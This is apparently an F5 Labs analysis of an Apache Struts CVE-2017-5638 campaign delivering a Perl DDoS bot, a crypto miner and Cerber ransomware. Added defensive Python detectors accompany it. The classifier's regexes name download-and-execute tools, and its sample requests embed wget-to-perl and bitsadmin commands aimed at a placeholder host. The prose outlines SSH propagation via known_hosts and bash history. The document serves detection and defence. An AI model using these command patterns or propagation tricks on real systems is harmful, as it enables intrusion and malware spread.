A common infection vector used by botnet creators is scanning the Internet for web vulnerabilities to exploit for malware or back doors. The advantage of hitting servers over personal consumer devices is the ability to leverage powerful hardware that is always online and has high bandwidth. Also, many servers do not have anti-virus solutions in place.
As soon as a zero-day remote code execution vulnerability is disclosed, it is common to see many scans in the wild. Some of these scans are researchers, but many of them are hostile exploit attempts. Following the disclosure of the “Jakarta Multipart Parser” vulnerability in Apache STRUTS 2 (CVE-2017-5638)[1], F5 researchers observed around 10 different campaigns in the wild. One in particular caught our eye.
This campaign started on the 10th of March, 2017, a couple of days after the vulnerability was disclosed. While it looked similar to the other CVE-2017-5638 campaigns, the attack vector seemed to be a slight modification of the original public exploit[2].
The exploit triggers the vulnerability via the Content-Type header value, which the attacker customized with shell commands to be executed if the server is vulnerable.
In the first days of this campaign, shell commands were observed to infect the machine with the “PowerBot” malware, which is written in PERL, and uses DDoS as its main functionality (also known as the PerlBot or Shellbot).
The typical infection tactic for the most commonly observed threat actors, who scan the Internet for web vulnerabilities as their attack strategy, has been to execute commands in several steps: downloading the malware from a remote server, setting it as executable (in the case of a binary file), running the malware, and removing the initial infection file.
Conventionally, attack payloads have relied on programs already installed on the target server to download the malware, such as wget and curl. In this campaign, the attacker also leverages the less common “fetch” program as well as a special mode of wget. With the “wget -qO -” options, the malware file is downloaded but is never written to a file on disk. Instead, the content is written to standard output and piped into the Perl interpreter for execution, minimizing the locally detectable footprint.
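The two observations above (the OGNL expression carried in the Content-Type header, and the download-and-execute idioms in the embedded shell command) are what a defender can match on at the web tier. The following is an added example, not code from the article or from F5: a small Python request classifier that splits a raw HTTP request into headers and flags a Content-Type that carries OGNL expression markers or download-and-execute patterns (wget -qO - piped into an interpreter, curl piped into a shell, fetch, and the BITSAdmin/ftp variant the article describes later). The sample requests, the host names and the C2 placeholder are constructed; the OGNL fragment is a non-functional placeholder rather than a working payload.

```python
import re

# OGNL markers characteristic of CVE-2017-5638 payloads placed in the
# Content-Type header: the parser only evaluates a header that begins with a
# "%{" expression, and public payloads set #_='multipart/form-data' first so the
# request still looks like a normal upload. Markers after "%{" are typical
# payload components, not a complete or authoritative signature list.
OGNL_MARKERS = re.compile(r"%\{|#_memberAccess|#cmd=|@ognl\.OgnlContext@", re.IGNORECASE)

# Download-and-execute idioms: wget -qO - piped into perl/sh, curl piped into a
# shell, the BSD "fetch" tool, and the Windows bitsadmin/ftp variant.
DOWNLOAD_EXEC = re.compile(
    r"(?:wget\s+-qO\s*-\s*\S+\s*\|\s*(?:perl|sh|bash))"
    r"|(?:curl\s+[^|]*\|\s*(?:perl|sh|bash))"
    r"|(?:\bfetch\s+\S+)"
    r"|(?:bitsadmin\s+/transfer)"
    r"|(?:\bftp\s+-s:)",
    re.IGNORECASE,
)


def parse_request_headers(raw):
    """Split a raw HTTP request (request line + headers) into a lower-cased dict."""
    headers = {}
    for line in raw.split("\r\n")[1:]:
        if not line:            # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def classify_request(raw):
    """Return the list of findings for one raw HTTP request (empty if benign)."""
    findings = []
    content_type = parse_request_headers(raw).get("content-type", "")
    if OGNL_MARKERS.search(content_type):
        findings.append("ognl-in-content-type")
    if DOWNLOAD_EXEC.search(content_type):
        findings.append("download-and-execute")
    return findings


# Constructed sample requests (not captured traffic): a legitimate multipart
# upload, then two requests whose Content-Type holds a placeholder OGNL
# expression with the campaign's Linux and Windows download idioms.
SAMPLE_REQUESTS = [
    "POST /upload.action HTTP/1.1\r\nHost: example.internal\r\n"
    "Content-Type: multipart/form-data; boundary=----ConstructedBoundary1234\r\n\r\n",
    "POST /upload.action HTTP/1.1\r\nHost: example.internal\r\n"
    "Content-Type: %{(#_='multipart/form-data').(#cmd='wget -qO - http://EXAMPLE-C2/a | perl')}\r\n\r\n",
    "POST /index.action HTTP/1.1\r\nHost: example.internal\r\n"
    "Content-Type: %{(#_='multipart/form-data').(#cmd='bitsadmin /transfer j http://EXAMPLE-C2/1.exe C:\\1.exe')}\r\n\r\n",
]


def scan(requests=SAMPLE_REQUESTS):
    """Classify every request; returns one findings list per request."""
    return [classify_request(r) for r in requests]


if __name__ == "__main__":
    for raw, findings in zip(SAMPLE_REQUESTS, scan()):
        print(raw.split("\r\n")[0], "->", findings or "clean")
```

The first pattern alone (a Content-Type beginning with “%{”) is the cheap, high-confidence check to put in front of a Struts application; the command patterns are there to tell a probe from a request that carries an actual payload, which is the distinction that decides whether a host needs an incident response rather than a blocked IP.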
Once the bot is in place, the infected server will connect to an IRC channel to retrieve commands from the botnet master, as shown in Figures 2 and 3. While joining the IRC, F5 researchers observed that the botnet has more than 2,500 victims at the time of this writing, including production servers. And this number is just for a single IRC channel.
By randomly exploring some of the names and IP addresses of the infected hosts connected to the channel, we could find production servers and servers hosted on the AWS infrastructure.
Several days after the beginning of the observed campaign, F5 researchers started seeing a variation of the same campaign. The payload switched from Perl to Bash scripting, but this turned out to be just a spearhead to deploy two different types of malware. The spearhead exploit downloads and executes the same PERL bot.
However, this time a “minerd” crypto coin mining program is downloaded as well, together with all of its prerequisites. The attacker disguises the malicious process and its configuration with names similar to those of the Apache server, so that they look innocent when an administrator of the infected host lists the running processes.
The bot will then mine coins into several legitimate crypto pools, as shown in the configuration file in Figure 6.
These cryptocoin pools appear to be hosted in France under the “crypto-pool.fr” domain name, as shown in Figure 7.
One of the more fascinating aspects of this malware was the creative technique that the spearhead exploit uses to propagate itself. It searches for all the remote IP addresses that the administrator of the server had connected to from this server. It reads the SSH “known_hosts” file, which keeps the addresses and fingerprints of all the servers the administrator had connected to, and it also scans the Bash history file for any IP addresses used within an SSH command. Once this list of IP addresses is compiled, the script tries to connect to each of them via SSH. Where authentication was set up to use a key file instead of a username and password, the malware successfully deploys itself on the remote machine.
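The propagation step above works only because known_hosts stores its targets in plaintext; OpenSSH can store them hashed instead (HashKnownHosts yes in ssh_config, or ssh-keygen -H on an existing file), which leaves the file useful for host-key verification but useless as a target list. The following is an added example, not code from the article or from F5: a Python audit that parses a known_hosts file in OpenSSH's format, counts hashed entries, and lists the plaintext IP addresses and host names a harvester like this one would recover. The sample file contents, host names, addresses and key material are constructed placeholders.

```python
import re
from ipaddress import ip_address

# "[host]:port" form used for non-default SSH ports in known_hosts.
HOST_PORT = re.compile(r"^\[(.+)\]:(\d+)$")

# Constructed sample known_hosts (placeholder keys, documentation addresses):
# two plaintext entries, one hashed entry, and one @cert-authority marker line.
SAMPLE_KNOWN_HOSTS = """\
# comment line
build01.internal,10.0.4.12 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEY
[192.0.2.25]:2222 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABPLACEHOLDERKEY
|1|kVxP7bT0W7w3Xq6a1WZ0ZLJeOsE=|o7nFmr9oL2xS3Yk9dXK0B3pC0mY= ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEY2
@cert-authority *.example.internal ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERCA
"""


def _strip_port(entry):
    """Return the host part of an entry, unwrapping the [host]:port form."""
    m = HOST_PORT.match(entry)
    return m.group(1) if m else entry


def audit_known_hosts(text):
    """Summarise how much of a known_hosts file is readable as a target list."""
    summary = {"hashed": 0, "markers": 0, "plaintext_ips": [], "plaintext_names": []}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if fields[0].startswith("@"):        # @cert-authority / @revoked marker
            summary["markers"] += 1
            fields = fields[1:]
        if len(fields) < 3:                  # need hosts, key type, key
            continue
        hostfield = fields[0]
        if hostfield.startswith("|1|"):      # HashKnownHosts format: |1|salt|hash
            summary["hashed"] += 1
            continue
        for entry in hostfield.split(","):   # one line may name several hosts
            host = _strip_port(entry)
            try:
                ip_address(host)
                summary["plaintext_ips"].append(host)
            except ValueError:
                summary["plaintext_names"].append(host)
    return summary


def exposure_count(summary):
    """Number of distinct plaintext targets the file hands to a harvester."""
    return len(set(summary["plaintext_ips"]) | set(summary["plaintext_names"]))


if __name__ == "__main__":
    result = audit_known_hosts(SAMPLE_KNOWN_HOSTS)
    print(result)
    print("plaintext targets recoverable:", exposure_count(result))
```

Run it against ~/.ssh/known_hosts for the accounts that hold deployment keys; a non-zero exposure count on a host that also holds passphrase-less private keys is exactly the condition the script in this campaign relies on, and hashing the file plus putting a passphrase or an agent in front of the keys removes both halves of it.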
In general, threat actors love new zero-days as an opportunity to recycle their campaigns. One of the IP addresses in this campaign originates from Hong Kong, as shown in Figure 9; this address was known before to use the notorious ShellShock (CVE-2014-6271) to deliver similar payloads.
F5 researchers noted that the malware file names have stayed the same (“.mailer” and “a”), as shown in Figures 10 and 11. However, the crypto mining pool and the account have been changed, as shown in Figure 12.
Delivering Linux DDoS malware by exploiting web vulnerabilities is commonly observed in the wild, and server ransomware seems to be one of the emerging trends since last year.
The same attacker (surprisingly using the same IP address) behind the previously described Apache STRUTS campaign varied the campaign again during the week of March 20th. This time, the payload infected Windows machines with the “Cerber” ransomware.
The structure of the Jakarta Multipart parser exploit is identical to the attack that was used to deliver the previous payloads. However, the shell commands now executed run the Windows BITSAdmin and ftp command-line tools (which ship with every Windows server) to download and run the file “1.exe”, as shown in Figure 13.
Once running, the malware encrypts the files and shows an image with a ransom message, as shown in Figure 14.
As per the usual ransomware methods, the victim is given instructions on how to pay the ransom to get their files back, as shown in Figure 15.
F5 researchers analyzed this malware variant and found that the author added functionality to modify Windows firewall rules so that installed anti-virus software is blocked from communicating with the outside world, thus preventing updates and reporting. The specific rules are shown in Figure 16.
To find the installed security products, the malware first runs WMI queries on the “AntiSpywareProduct” and “FirewallProduct” classes.
Then it traverses the files and folders returned by the query and adds each executable it finds to a firewall rule.
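A rule set produced this way has a recognisable shape on the host: outbound Block rules whose program path sits under a security product's installation directory. The following is an added example, not code from the article or from F5: a Python audit that parses the key/value text that `netsh advfirewall firewall show rule name=all verbose` prints, and flags block rules whose Program path is inside one of the directories a defender would obtain from the same WMI classes the malware queries. The rule text, rule names and product paths below are constructed samples rather than output captured from an infected machine.

```python
import os

# Constructed sample in the layout netsh prints (one "Rule Name:" block per
# rule, dashed separator, "Key: value" lines). Paths and names are placeholders.
SAMPLE_NETSH_OUTPUT = """\
Rule Name:                            ExampleAV updater
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Program:                              C:\\Program Files\\ExampleAV\\updater.exe
Action:                               Allow

Rule Name:                            svchost-av
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Program:                              C:\\Program Files\\ExampleAV\\avservice.exe
Action:                               Block

Rule Name:                            Block telnet client
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Program:                              C:\\Windows\\System32\\telnet.exe
Action:                               Block
"""

# Directories a defender would derive from the root\\SecurityCenter2 WMI classes
# (the article names AntiSpywareProduct and FirewallProduct); constructed here.
SAMPLE_PRODUCT_DIRS = ["C:\\Program Files\\ExampleAV"]


def parse_netsh_rules(text):
    """Turn netsh 'show rule' output into a list of {key: value} dicts."""
    rules, current = [], None
    for line in text.splitlines():
        if not line.strip() or set(line.strip()) == {"-"}:
            continue                          # blank line or dashed separator
        key, _, value = line.partition(":")   # first colon only: paths contain "C:"
        key, value = key.strip(), value.strip()
        if key == "Rule Name":
            current = {"Rule Name": value}
            rules.append(current)
        elif current is not None:
            current[key] = value
    return rules


def _under(path, directory):
    """True when path lies inside directory (case-insensitive, Windows style)."""
    p = os.path.normcase(path).replace("/", "\\").rstrip("\\")
    d = os.path.normcase(directory).replace("/", "\\").rstrip("\\")
    return p.lower().startswith(d.lower() + "\\")


def find_security_block_rules(rules, product_dirs):
    """Names of enabled outbound Block rules aimed at a security product's binaries."""
    flagged = []
    for rule in rules:
        if rule.get("Action", "").lower() != "block":
            continue
        if rule.get("Enabled", "").lower() != "yes" or rule.get("Direction", "").lower() != "out":
            continue
        program = rule.get("Program", "")
        if any(_under(program, d) for d in product_dirs):
            flagged.append(rule["Rule Name"])
    return flagged


def audit(text=SAMPLE_NETSH_OUTPUT, product_dirs=SAMPLE_PRODUCT_DIRS):
    return find_security_block_rules(parse_netsh_rules(text), product_dirs)


if __name__ == "__main__":
    print("suspicious block rules:", audit())
```

Because the malware names its rules to blend in, matching on rule names is unreliable; matching on the combination of action, direction and program path is what survives renaming, and the same check is easy to run periodically so that a newly appeared block rule for a security product becomes an alert rather than a silent loss of updates.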
The attackers running this campaign are using the same Bitcoin ID for a number of campaigns.
This particular account has processed 84 bitcoins, which translates to roughly $86,000 USD at current market value (bitcoin value fluctuates slightly day to day). Since the Struts exploit has become publicly available, we observed 2.2 bitcoins going in and out of this wallet, worth roughly $2,300 USD.
As we have seen in the past, it is amazing how fast existing threat actors using older web vulnerabilities in their campaigns can adapt to switch to newly released zero-days to deliver the same payloads. This gives them a new vulnerability window to exploit while the defenders install patches.
The new vulnerability in Apache STRUTS provides a target-rich environment for threat actors to extend their business while infecting thousands of new servers. Targeting servers, rather than individuals, with ransomware has better chances for monetization because those are usually run by organizations with deeper pockets and better infrastructure that might be critical for their business.
In this article we have analyzed only a single campaign targeting Apache STRUTS. There are around 10 additional ones, most of which are reconnaissance, while others deliver traditional Linux DDoS malware.
Check back with F5 Labs for updates on how these campaigns advance.
MODIFIED: Jul 24, 2017